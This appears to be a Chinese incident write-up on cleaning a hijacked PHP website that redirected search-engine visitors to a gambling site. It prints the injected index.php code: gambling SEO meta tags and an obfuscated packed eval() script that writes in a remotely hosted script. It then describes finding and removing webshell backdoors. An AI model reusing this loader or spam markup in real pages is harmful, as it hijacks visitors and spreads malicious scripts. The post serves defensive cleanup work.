收到朋友微信求助说其中一个php网站被劫持,一直找不到原因,由于他是做网站建设的,服务器上的网站非常杂,存在漏洞被利用然后劫持也是很正常。接下来以这个案例说说网站劫持怎么修复
历史处理案例1:iis7.0全部网站被劫持处理过程分享,如何解决网站劫持!
历史处理案例2:百度 360 搜狗搜索引擎劫持攻击处理过程
百度收录的快照信息:
正常输入网址不会跳转,通过百度 360 搜狗等搜索引擎访问就会跳转到一个博彩网站,看来黑客有意躲避
登录ftp下载index.php存在异常代码如下:
<meta name="viewport" content="width=1250" />
<title>北京赛车pk10 PK10开奖直播 北京赛车pk10开奖结果 - pk10直播网</title>
<meta name="keywords" content="北京赛车pk10开奖直播,北京赛车开奖记录,北京赛车pk10直播,北京赛车开奖直播,北京赛车pk10开奖网,pk10北京赛车网赚,北京赛车网赚,北京赛车带玩,北京赛车网赚群,北京赛车pk10技巧,北京赛车怎么玩赚钱,北京赛车 吉祥娱乐,北京赛车官网,北京赛车直播,北京赛车开奖" />
<meta name="description" content="北京赛车,PK10开奖直播,提供【cx88cp.com】详尽研究分析总结,分享北京pk10开奖视频,pk10结果分析,北京赛车平台,pk10网上投注,北京pk10开奖直播,pk10开奖直播,北京pk10过往各开奖记录,pk10开奖结果,pk10网上开户,pk10开奖,专业的开奖视频北京pk10网"/>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\d\\e\\1\\m\\j\\8\\n\\0"]["\\6\\4\\9\\0\\8"](\'\\i\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\c\\7\\0\\8\\h\\0\\5\\f\\b\\q\\b\\2\\1\\4\\9\\3\\0\\7 \\2\\4\\1\\c\\7\\o\\0\\0\\3\\2\\p\\5\\5\\6\\6\\6\\a\\1\\3\\d\\b\\2\\r\\a\\1\\e\\j\\5\\1\\h\\1\\a\\f\\2\\7\\g\\i\\5\\2\\1\\4\\9\\3\\0\\g\');',28,28,'x74|x63|x73|x70|x72|x2f|x77|x22|x65|x69|x2e|x61|x3d|x64|x6f|x6a|x3e|x78|x3c|x6d|x79|window|x75|x6e|x68|x3a|x76|x38'.split('|'),0,{}))
</script>
朋友说删除后一天内又会挂回去,既然能修改页面内容必定存在后门或者有ftp权限等 查看ftp日志并没有收获,WebShellKill走一波发现有所收获扫出几个后门木马和小马 黑客也相当之狡猾把木马文件时间修改成几年前 可惜网站日志没有开启无法追查后门的由来。
网页木马包含asp大马 php大马 php一句话 php小马
为了能彻底处理掉这些后门开启网站访问日志,删除劫持代码静观几天待再次修改主页再分析日志,下为最近访问日志
通过把16号-18号的日志进行筛选查实存在10几个后门,最后把全部木马后门删除 修改网站目录权限再次进入观察
最后建议把网站日志开启,出现被黑可以通过日志进行分析人工排查 市面上能扫后门的工具相当之多比如WebShellKill 安全狗 云盾 云锁等等
本教程由铁网维原创出品 服务器运维官方网址http://www.tieww.com 欢迎大家多多关注本站 感谢大家的支持。
